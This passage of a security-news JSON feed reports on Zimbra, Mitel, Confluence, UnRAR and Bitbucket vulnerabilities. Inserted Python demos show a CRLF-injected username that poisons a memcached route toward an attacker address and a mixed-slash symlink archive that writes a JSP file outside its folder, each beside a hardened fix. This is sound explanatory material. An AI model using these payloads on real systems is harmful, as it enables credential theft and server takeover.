Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-02T09:45:00", "type": "thn", "title": "North Korean Hackers Exploit Unpatched Zimbra Devices in 'No Pineapple' Campaign", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4034", "CVE-2022-27925", "CVE-2022-37042"], "modified": "2023-02-03T07:08:18", "id": "THN:542C8086F46B453764514414E6C59C5E", "href": "https://thehackernews.com/2023/02/north-korean-hackers-exploit-unpatched.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-14T16:23:00", "description": "The operators behind the Lorenz ransomware operation have been observed exploiting a 
now-patched critical security flaw in Mitel MiVoice Connect to obtain a foothold into target environments for follow-on malicious activities.\n\n\"Initial malicious activity originated from a Mitel appliance sitting on the network perimeter,\" researchers from cybersecurity firm Arctic Wolf [said](<https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/>) in a report published this week.\n\n\"Lorenz exploited [CVE-2022-29499](<https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-22-0002>), a remote code execution vulnerability impacting the Mitel Service Appliance component of MiVoice Connect, to obtain a reverse shell and subsequently used [Chisel](<https://github.com/jpillora/chisel>) as a tunneling tool to pivot into the environment.\"\n\nLorenz, like many other ransomware groups, is known for double extortion by exfiltrating data prior to encrypting systems, with the actor targeting small and medium businesses (SMBs) located in the U.S., and to a lesser extent in China and Mexico, since at least February 2021.\n\nCalling it an \"ever-evolving ransomware,\" Cybereason [noted](<https://www.cybereason.com/blog/research/cybereason-vs.-lorenz-ransomware>) that Lorenz \"is believed to be a rebranding of the '.sZ40' ransomware that was discovered in October 2020.\"\n\nThe weaponization of Mitel VoIP appliances for ransomware attacks mirrors recent findings from CrowdStrike, which [disclosed](<https://thehackernews.com/2022/06/hackers-exploit-mitel-voip-zero-day-bug.html>) details of a ransomware intrusion attempt that leveraged the same tactic to achieve remote code execution against an unnamed target.\n\nMitel VoIP products are also a [lucrative entry point](<https://www.rapid7.com/blog/post/2022/07/07/exploitation-of-mitel-mivoice-connect-sa-cve-2022-29499/>) in light of the fact that there are nearly 20,000 internet-exposed devices online, as [revealed](<https://twitter.com/GossiTheDog/status/1540309810176217088>) by 
security researcher Kevin Beaumont, leaving them reachable by attackers.\n\nIn one Lorenz ransomware attack investigated by Arctic Wolf, the threat actors weaponized the remote code execution flaw to establish a reverse shell and download the Chisel proxy utility.\n\nThis implies that the initial access was either facilitated with the help of an initial access broker ([IAB](<https://thehackernews.com/2022/03/google-uncovers-initial-access-broker.html>)) that's in possession of an exploit for CVE-2022-29499 or that the threat actors developed or acquired a working exploit themselves.\n\nWhat's also notable is that the Lorenz group waited for almost a month after obtaining initial access to conduct post-exploitation actions, including establishing persistence by means of a web shell, harvesting credentials, network reconnaissance, privilege escalation, and lateral movement.\n\nThe compromise eventually culminated in the exfiltration of data using FileZilla, following which the hosts were encrypted using Microsoft's built-in BitLocker drive encryption, underscoring the [continued abuse](<https://thehackernews.com/2022/09/microsoft-warns-of-ransomware-attacks.html>) of living-off-the-land binaries (LOLBINs) by adversaries.\n\n\"Monitoring just critical assets is not enough for organizations,\" the researchers said, adding \"security teams should monitor all externally facing devices for potential malicious activity, including VoIP and IoT devices.\"\n\n\"Threat actors are beginning to shift targeting to lesser known or monitored assets to avoid detection.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-14T14:04:00", "type": "thn", "title": "Lorenz Ransomware Exploit Mitel VoIP Systems to Breach Business Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-09-14T14:04:33", "id": "THN:065BFC8E7532E662AE90BB82F405B132", "href": "https://thehackernews.com/2022/09/lorenz-ransomware-exploit-mitel-voip.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T07:00:49", "description": "The U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) on Friday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/07/29/cisa-adds-one-known-exploited-vulnerability-catalog>) the recently disclosed Atlassian security flaw to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.\n\nThe vulnerability, tracked as [CVE-2022-26138](<https://thehackernews.com/2022/07/atlassian-releases-patch-for-critical.html>), concerns the use of hard-coded credentials when the Questions For Confluence app is enabled in Confluence Server and Data Center instances.\n\n\"A remote unauthenticated attacker can use these credentials to log into Confluence and access all content accessible to users in the confluence-users group,\" CISA [notes](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in its advisory.\n\nDepending on the page restrictions and the information a company has in Confluence, successful exploitation of the shortcoming could lead to the disclosure of sensitive information.\n\nAlthough the bug was addressed by the Australian software company last week in Questions for Confluence versions 2.7.38 and 3.0.5, it has since come [under active exploitation](<https://thehackernews.com/2022/07/latest-critical-atlassian-confluence.html>), cybersecurity firm Rapid7 disclosed this week.\n\n\"Exploitation efforts at this point do not seem to be very widespread, though we expect that to change,\" Erick Galinkin, principal AI researcher at Rapid7, told The Hacker News.\n\n\"The good news is that the vulnerability is in the Questions for Confluence app and _not_ in Confluence itself, which reduces the attack surface significantly.\"\n\nWith the flaw now added to the catalog, Federal 
Civilian Executive Branch (FCEB) agencies in the U.S. are mandated to apply patches by August 19, 2022, to reduce their exposure to cyberattacks.\n\n\"At this point, the vulnerability has been public for a relatively short amount of time,\" Galinkin noted. \"Coupled with the absence of meaningful post-exploitation activity, we don't yet have any threat actors attributed to the attacks.\"\n", "cvss3": {}, "published": "2022-07-30T03:54:00", "type": "thn", "title": "CISA Warns of Atlassian Confluence Hard-Coded Credential Bug Exploited in Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-02T06:42:46", "id": "THN:908A39F901145B6FD175B16E95137ACC", "href": "https://thehackernews.com/2022/07/cisa-warns-of-atlassian-confluence-hard.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-29T03:59:30", "description": "A week after Atlassian rolled out patches to contain a critical flaw in its Questions For Confluence app for Confluence Server and Confluence Data Center, the shortcoming has now come under active exploitation in the wild.\n\nThe bug in question is [CVE-2022-26138](<https://thehackernews.com/2022/07/atlassian-releases-patch-for-critical.html>), which concerns the use of a hard-coded password in the app that could be exploited by a remote, unauthenticated attacker to log in and read every page visible to the confluence-users group.\n\nThe real-world exploitation 
follows the release of the hard-coded credentials on Twitter, prompting the Australian software company to prioritize patches to mitigate potential threats targeting the flaw.\n\n\"Unsurprisingly, it didn't take long [...] to observe exploitation once the hard-coded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks,\" Rapid7 security researcher Glenn Thorpe [said](<https://www.rapid7.com/blog/post/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/>).\n\nIt's worth noting that the account is only created once the Questions for Confluence app has been enabled. That said, uninstalling the app afterwards does not remediate the flaw, as the created account is not removed automatically when the app is uninstalled.\n\nUsers of the affected product are advised to update the app on their on-premises instances to the fixed versions (2.7.38 and 3.0.5) as soon as possible, or take steps to disable or delete the account.\n\nThe development also arrives as Palo Alto Networks, in its [2022 Unit 42 Incident Response Report](<https://www.paloaltonetworks.com/unit42/2022-incident-response-report>), found that threat actors are scanning for vulnerable endpoints within 15 minutes of public disclosure of a new security flaw.\n", "cvss3": {}, "published": "2022-07-29T03:19:00", "type": "thn", "title": "Latest Critical Atlassian Confluence Vulnerability Under Active Exploitation", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-29T03:22:24", "id": "THN:49CD77302B5D845459BA34357D9C011C", "href": "https://thehackernews.com/2022/07/latest-critical-atlassian-confluence.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-16T03:57:00", "description": "A new high-severity vulnerability has been disclosed in the Zimbra email suite that, if successfully exploited, enables an unauthenticated attacker to steal cleartext passwords of users without any user interaction.\n\n\"With the consequent access to the victims' mailboxes, attackers can potentially escalate their access to targeted organizations and gain access to various internal services and steal highly sensitive information,\" SonarSource [said](<https://blog.sonarsource.com/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/>) in a report shared with The Hacker News.\n\nTracked as [CVE-2022-27924](<https://nvd.nist.gov/vuln/detail/CVE-2022-27924>) (CVSS score: 7.5), the issue has been characterized as a case of \"Memcached poisoning with unauthenticated request,\" leading to a scenario where an adversary can inject malicious commands and siphon sensitive information.\n\nThis is made possible by poisoning the 
[IMAP](<https://en.wikipedia.org/wiki/Internet_Message_Access_Protocol>) route cache entries in the Memcached server that's used to look up Zimbra users and forward their HTTP requests to appropriate backend services. Memcached is an in-memory key-value storage system for use as a high performance cache or session store for external database and API calls \u2014 in this case the lookup service.\n\nGiven that Memcached parses incoming requests line-by-line, the vulnerability permits an attacker to send a specially crafted lookup request to the server containing [CRLF characters](<https://developer.mozilla.org/en-US/docs/Glossary/CRLF>), causing the server to execute unintended commands.\n\nThe flaw exists because \"newline characters (\\r\\n) are not escaped in untrusted user input,\" the researchers explained. \"This code flaw ultimately allows attackers to steal cleartext credentials from users of targeted Zimbra instances.\"\n\nArmed with this capability, the attacker can subsequently corrupt the cache to overwrite an entry such that it forwards all IMAP traffic to an attacker-controlled server, including the targeted user's credentials in cleartext.\n\nThat said, the attack presupposes the adversary already is in possession of the victims' email addresses so as to be able to poison the cache entries and that they use an IMAP client to retrieve email messages from a mail server.\n\n\"Typically, an organization uses a pattern for email addresses for their members, such as e.g., {firstname}.{lastname}@example.com,\" the researchers said. 
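The CRLF injection described above, as an added example that is neither Zimbra's nor SonarSource's code: a lookup builder in the vulnerable form and in a hardened form, a minimal emulation of how memcached reads a request stream line by line, and a response reader that refuses values for any key it did not ask for (consuming responses without checking the key is what lets injected responses be served to other lookups). The route key names, the backend addresses and the attacker-supplied username are constructed for illustration.

```python
"""Memcached text-protocol CRLF injection: the CVE-2022-27924 pattern, vulnerable and hardened.

Added example, not Zimbra's code. Key names ("route:<user>"), backend addresses and the
attacker-controlled username are constructed for illustration.
"""
from __future__ import annotations

from typing import Dict, List, Optional

CRLF = "\r\n"
MAX_KEY_BYTES = 250  # memcached text protocol: keys are at most 250 bytes


def build_lookup_vulnerable(prefix: str, user: str) -> str:
    """Concatenate untrusted input into the command line without escaping (the flaw)."""
    return f"get {prefix}{user}{CRLF}"


def validate_key(key: str) -> str:
    """Reject keys the memcached protocol itself does not allow: control characters
    (CR, LF, NUL, ...), whitespace, and empty or over-long keys."""
    raw = key.encode("utf-8")
    if not raw or len(raw) > MAX_KEY_BYTES:
        raise ValueError("memcached key length out of range")
    if any(b <= 0x20 or b == 0x7F for b in raw):
        raise ValueError("control character or whitespace in memcached key")
    return key


def build_lookup_hardened(prefix: str, user: str) -> str:
    """Same lookup, but the key is validated before it reaches the wire."""
    return f"get {validate_key(prefix + user)}{CRLF}"


def hardened_rejects(prefix: str, user: str) -> bool:
    """True when the hardened builder refuses the input."""
    try:
        build_lookup_hardened(prefix, user)
    except ValueError:
        return True
    return False


def parse_commands(stream: str) -> List[List[str]]:
    """Emulate how the server reads a request stream: one command per CRLF-terminated
    line, with 'set' consuming the following line as its data block."""
    lines = stream.split(CRLF)
    commands: List[List[str]] = []
    i = 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if not line:
            continue
        parts = line.split(" ")
        if parts[0] == "set" and i < len(lines):
            parts.append(lines[i])  # data block follows the set line
            i += 1
        commands.append(parts)
    return commands


def apply_commands(commands: List[List[str]], cache: Dict[str, str]) -> List[str]:
    """Execute parsed commands against an in-memory cache; return the response lines."""
    responses: List[str] = []
    for cmd in commands:
        if cmd[0] == "get":
            for key in cmd[1:]:
                if key in cache:
                    responses.append(f"VALUE {key} 0 {len(cache[key])}{CRLF}{cache[key]}")
            responses.append("END")
        elif cmd[0] == "set" and len(cmd) == 6:
            key, _flags, _exptime, nbytes, data = cmd[1:]
            if len(data.encode("utf-8")) == int(nbytes):
                cache[key] = data
                responses.append("STORED")
            else:
                responses.append("CLIENT_ERROR bad data chunk")
    return responses


def read_route(responses: List[str], expected_key: str) -> Optional[str]:
    """Consume a GET response but accept only the key that was asked for; a VALUE for
    any other key is an injected response and is rejected instead of being routed on."""
    for item in responses:
        if item.startswith("VALUE "):
            header, _, data = item.partition(CRLF)
            key = header.split(" ")[1]
            if key != expected_key:
                raise ValueError(f"response for unexpected key {key!r}")
            return data
    return None


# Constructed scenario: the cache knows where target@example.com's IMAP backend lives,
# and an attacker supplies a "username" that smuggles a 'set' overwriting that entry.
ATTACKER_BACKEND = "203.0.113.7:143"
EVIL_USER = (
    "victim@example.com" + CRLF
    + f"set route:target@example.com 0 0 {len(ATTACKER_BACKEND)}" + CRLF
    + ATTACKER_BACKEND
)


def poison_demo() -> Dict[str, str]:
    """Return the cache after the vulnerable lookup has processed EVIL_USER."""
    cache = {"route:target@example.com": "10.10.1.20:143"}  # legitimate backend (constructed)
    apply_commands(parse_commands(build_lookup_vulnerable("route:", EVIL_USER)), cache)
    return cache


if __name__ == "__main__":
    print(parse_commands(build_lookup_vulnerable("route:", EVIL_USER)))
    print(poison_demo())
    print("hardened lookup rejects input:", hardened_rejects("route:", EVIL_USER))
```

Run it and the vulnerable builder emits two commands, the intended `get` plus the smuggled `set`, so the in-memory cache ends up routing target@example.com's IMAP session to the attacker's address; the hardened builder refuses the same input before it reaches the wire. Rejecting rather than escaping is deliberate: the protocol forbids control characters and whitespace in keys, so there is no legitimate input that the check turns away.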
\"A list of email addresses could be obtained from OSINT sources such as LinkedIn.\"\n\nA threat actor, however, can get around these restrictions by exploiting a technique called [response smuggling](<https://capec.mitre.org/data/definitions/273.html>), which here means using the same CRLF injection to push surplus responses into Memcached's shared response stream, so that lookups for other users consume an attacker-supplied route and their IMAP traffic is forwarded to a rogue server, stealing credentials from users without prior knowledge of their email addresses.\n\n\"The idea is that by continuously injecting more responses than there are work items into the shared response streams of Memcached, we can force random Memcached lookups to use injected responses instead of the correct response,\" the researchers explained. \"This works because Zimbra did not validate the key of the Memcached response when consuming it.\"\n\nFollowing responsible disclosure on March 11, 2022, patches to completely plug the security hole were [shipped](<https://blog.zimbra.com/2022/05/new-zimbra-security-patches-9-0-0-patch-24-1-and-8-8-15-patch-31-1/>) by Zimbra on May 10, 2022, in versions [8.8.15 P31.1](<https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31.1>) and [9.0.0 P24.1](<https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24.1>).\n\nThe findings arrive months after cybersecurity firm Volexity disclosed an espionage campaign dubbed [EmailThief](<https://thehackernews.com/2022/02/hackers-exploited-0-day-vulnerability.html>) that weaponized a zero-day vulnerability in the email platform to target European government and media entities in the wild.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-14T15:13:00", "type": "thn", "title": "New Zimbra Email Vulnerability Could Let Attackers Steal Your Login Credentials", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-06-16T03:13:54", "id": "THN:86F6539B2FD5CE0DEC7585157E18CBEF", "href": "https://thehackernews.com/2022/06/new-zimbra-email-vulnerability-could.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-05T05:59:49", "description": "The U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a recently disclosed high-severity vulnerability in the Zimbra email suite to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), citing [evidence of active exploitation](<https://www.cisa.gov/uscert/ncas/current-activity/2022/08/04/cisa-adds-one-known-exploited-vulnerability-catalog>).\n\nThe issue in question is [CVE-2022-27924](<https://thehackernews.com/2022/06/new-zimbra-email-vulnerability-could.html>) (CVSS score: 7.5), a command injection flaw in the platform that could lead to the execution of arbitrary Memcached commands and theft of sensitive information.\n\n\"Zimbra Collaboration (ZCS) allows an attacker to inject memcached commands into a targeted instance which causes an overwrite of arbitrary cached entries,\" CISA said.\n\nSpecifically, the bug relates to unescaped newline characters in user input that, if successfully exploited, could enable attackers to steal cleartext credentials from users of targeted Zimbra instances.\n\nThe issue was [disclosed](<https://thehackernews.com/2022/06/new-zimbra-email-vulnerability-could.html>) by SonarSource in June, with [patches](<https://blog.zimbra.com/2022/05/new-zimbra-security-patches-9-0-0-patch-24-1-and-8-8-15-patch-31-1/>) released by Zimbra on May 10, 2022, in versions 8.8.15 P31.1 and 9.0.0 P24.1.\n\nCISA hasn't shared technical details of the attacks that exploit the vulnerability in the wild and has yet to attribute them to a specific threat actor.\n\nIn light of active exploitation of the flaw, users are recommended to apply the updates to the software to reduce their exposure to potential cyberattacks.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-05T05:54:00", "type": "thn", "title": "CISA Adds Zimbra Email Vulnerability to its Exploited Vulnerabilities Catalog", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-08-05T05:54:43", "id": "THN:EAE0157F6308D86DB939FA200A017132", "href": "https://thehackernews.com/2022/08/cisa-adds-zimbra-email-vulnerability-to.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-06-29T09:57:40", "description": "A new security vulnerability has been disclosed in RARLAB's UnRAR utility that, if 
successfully exploited, could permit a remote attacker to execute arbitrary code on a system that relies on the binary.\n\nThe flaw, assigned the identifier CVE-2022-30333, relates to a path traversal vulnerability in the Unix versions of UnRAR that can be triggered upon extracting a maliciously crafted RAR archive.\n\nFollowing responsible disclosure on May 4, 2022, the shortcoming was addressed by RARLAB as part of [version 6.12](<https://www.rarlab.com/download.htm>) released on May 6. Other versions of the software, including those for Windows and Android operating systems, are not impacted.\n\n\"An attacker is able to create files outside of the target extraction directory when an application or victim user extracts an untrusted archive,\" SonarSource researcher Simon Scannell [said](<https://blog.sonarsource.com/zimbra-pre-auth-rce-via-unrar-0day/>) in a Tuesday report. \"If they can write to a known location, they are likely to be able to leverage it in a way leading to the execution of arbitrary commands on the system.\"\n\nIt's worth pointing out that any software that utilizes an unpatched version of UnRAR to extract untrusted archives is affected by the flaw.\n\nThis also includes the Zimbra Collaboration Suite, where the vulnerability could lead to pre-authenticated remote code execution on a vulnerable instance, giving the attacker complete control of the mail server, which can then be abused to access or overwrite other internal resources within the organization's network.\n\nImage source: [Simon Scannell](<https://twitter.com/scannell_simon/status/1541800107909185537>)\n\nThe vulnerability, at its heart, relates to a [symbolic link](<https://en.wikipedia.org/wiki/Symbolic_link>) attack 
in which a RAR archive is crafted such that it contains a symlink whose target mixes forward slashes and backslashes (e.g., \"..\\..\\..\\tmp/shell\") so as to bypass the traversal checks, which run before the slash conversion described next, and extract it outside of the expected directory.\n\nMore specifically, the weakness has to do with a function that's designed to convert backslashes ('\\') to forward slashes ('/') so that a RAR archive created on Windows can be extracted on a Unix system, effectively altering the aforementioned symlink to \"../../../tmp/shell.\"\n\nBy taking advantage of this behavior, an attacker can write arbitrary files anywhere on the target filesystem that the extracting process can write to, including creating a JSP shell in Zimbra's web directory and executing malicious commands.\n\n\"The only requirement for this attack is that UnRAR is installed on the server, which is expected as it is required for RAR archive virus-scanning and spam-checking,\" Scannell noted.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-06-29T09:29:00", "type": "thn", "title": "New UnRAR Vulnerability Could Let Attackers Hack Zimbra Webmail Servers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", 
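The check-then-convert ordering just described, as an added example that is not UnRAR's code: a traversal check that runs before backslash conversion, the same check run after it, and a dry run of a constructed two-entry archive showing how a file written through the accepted symlink lands outside the extraction directory. The extraction directory, the entry names and the benign entry are constructed; the link target is the mixed-slash one quoted above.

```python
"""Archive symlink targets: check-then-convert (vulnerable) vs. convert-then-check (fixed).

Added example, not UnRAR's code. The extraction directory and archive entries are
constructed; the link target is the mixed-slash one quoted in the article.
"""
from __future__ import annotations

import posixpath
from typing import Callable, Dict, List, Optional, Tuple


def is_safe_link_target(target: str) -> bool:
    """Traversal check: reject absolute targets and any '..' path component."""
    return not target.startswith("/") and ".." not in target.split("/")


def windows_to_unix(path: str) -> str:
    """The conversion that lets a RAR archive built on Windows extract on Unix."""
    return path.replace("\\", "/")


def resolve_vulnerable(extract_dir: str, target: str) -> Optional[str]:
    """Check first, convert afterwards. Split on '/', the target '..\\..\\..\\tmp/shell'
    has no '..' component, so it passes; the conversion then yields ../../../tmp/shell."""
    if not is_safe_link_target(target):
        return None
    return posixpath.normpath(posixpath.join(extract_dir, windows_to_unix(target)))


def resolve_fixed(extract_dir: str, target: str) -> Optional[str]:
    """Convert first, check the converted form, and as defence in depth confirm the
    normalised result still lies under the extraction directory."""
    unix_target = windows_to_unix(target)
    if not is_safe_link_target(unix_target):
        return None
    root = posixpath.normpath(extract_dir)
    final = posixpath.normpath(posixpath.join(root, unix_target))
    if final != root and not final.startswith(root + "/"):
        return None
    return final


Resolver = Callable[[str, str], Optional[str]]
Entry = Tuple[str, str, Optional[str]]  # (archive path, "symlink" or "file", link target)


def plan_extraction(entries: List[Entry], extract_dir: str, resolver: Resolver) -> Dict[str, Optional[str]]:
    """Dry-run an archive listing: where would each entry be written? None means the
    resolver rejected a link. A regular file whose archive path runs through an earlier
    symlink entry is written wherever that link points, which is the attack's second step."""
    links: Dict[str, str] = {}
    plan: Dict[str, Optional[str]] = {}
    for name, kind, target in entries:
        if kind == "symlink":
            dest = resolver(extract_dir, target or "")
            if dest is not None:
                links[name] = dest
            plan[name] = dest
            continue
        head, sep, tail = name.partition("/")
        if sep and head in links:
            plan[name] = posixpath.normpath(posixpath.join(links[head], tail))
        else:
            plan[name] = posixpath.normpath(posixpath.join(extract_dir, name))
    return plan


EXTRACT_DIR = "/srv/extract"  # constructed
MALICIOUS_ARCHIVE: List[Entry] = [
    ("x", "symlink", "..\\..\\..\\tmp/shell"),  # the article's target, as stored in the archive
    ("x/cmd.jsp", "file", None),                 # written through the link
    ("docs/readme.txt", "file", None),           # benign entry
]


if __name__ == "__main__":
    for label, resolver in (("vulnerable", resolve_vulnerable), ("fixed", resolve_fixed)):
        print(label, plan_extraction(MALICIOUS_ARCHIVE, EXTRACT_DIR, resolver))
```

With the vulnerable resolver the link resolves to /tmp/shell and the second entry is written to /tmp/shell/cmd.jsp; with the fixed resolver the link is rejected and the same entry stays under /srv/extract. The final containment check in `resolve_fixed` is redundant with the component check today, but it means a later change to that check cannot silently reopen the hole.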
"availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-06-29T09:29:21", "id": "THN:7657424EABF9BB266876E3BD437269F4", "href": "https://thehackernews.com/2022/06/new-unrar-vulnerability-could-let.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-08-26T21:05:40", "description": "Atlassian has rolled out fixes for a [critical security flaw](<https://confluence.atlassian.com/security/august-2022-atlassian-security-advisories-overview-1155155092.html>) in Bitbucket Server and Data Center that could lead to the execution of malicious code on vulnerable installations.\n\nTracked as **CVE-2022-36804** (CVSS score: 9.9), the issue has been characterized as a command injection vulnerability in multiple endpoints that could be exploited via specially crafted HTTP requests.\n\n\"An attacker with access to a public Bitbucket repository or with read permissions to a private one can execute arbitrary code by sending a malicious HTTP request,\" Atlassian [said](<https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html>) in an advisory.\n\nThe shortcoming, discovered and reported by security researcher [@TheGrandPew](<https://twitter.com/TheGrandPew>), impacts all versions of Bitbucket Server and Datacenter released after 6.10.17, inclusive of 7.0.0 and newer -\n\n * Bitbucket Server and Datacenter 7.6\n * Bitbucket Server and Datacenter 7.17\n * 
Bitbucket Server and Datacenter 7.21\n * Bitbucket Server and Datacenter 8.0\n * Bitbucket Server and Datacenter 8.1\n * Bitbucket Server and Datacenter 8.2, and\n * Bitbucket Server and Datacenter 8.3\n\nAs a temporary workaround in scenarios where the patches cannot be applied right away, Atlassian is recommending turning off anonymous access to public repositories by setting \"feature.public.access=false\" in the bitbucket.properties configuration file, to prevent unauthenticated users from exploiting the flaw.\n\n\"This can not be considered a complete mitigation as an attacker with a user account could still succeed,\" it cautioned, meaning it could be leveraged by threat actors who are already in possession of valid credentials obtained through other means.\n\nUsers of affected versions of the software are recommended to upgrade their instances to the latest version as soon as possible to mitigate potential threats.\n", "cvss3": {}, "published": "2022-08-26T19:39:00", "type": "thn", "title": "Critical Vulnerability Discovered in Atlassian Bitbucket Server and Data Center", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-36804"], "modified": "2022-08-26T19:42:02", "id": 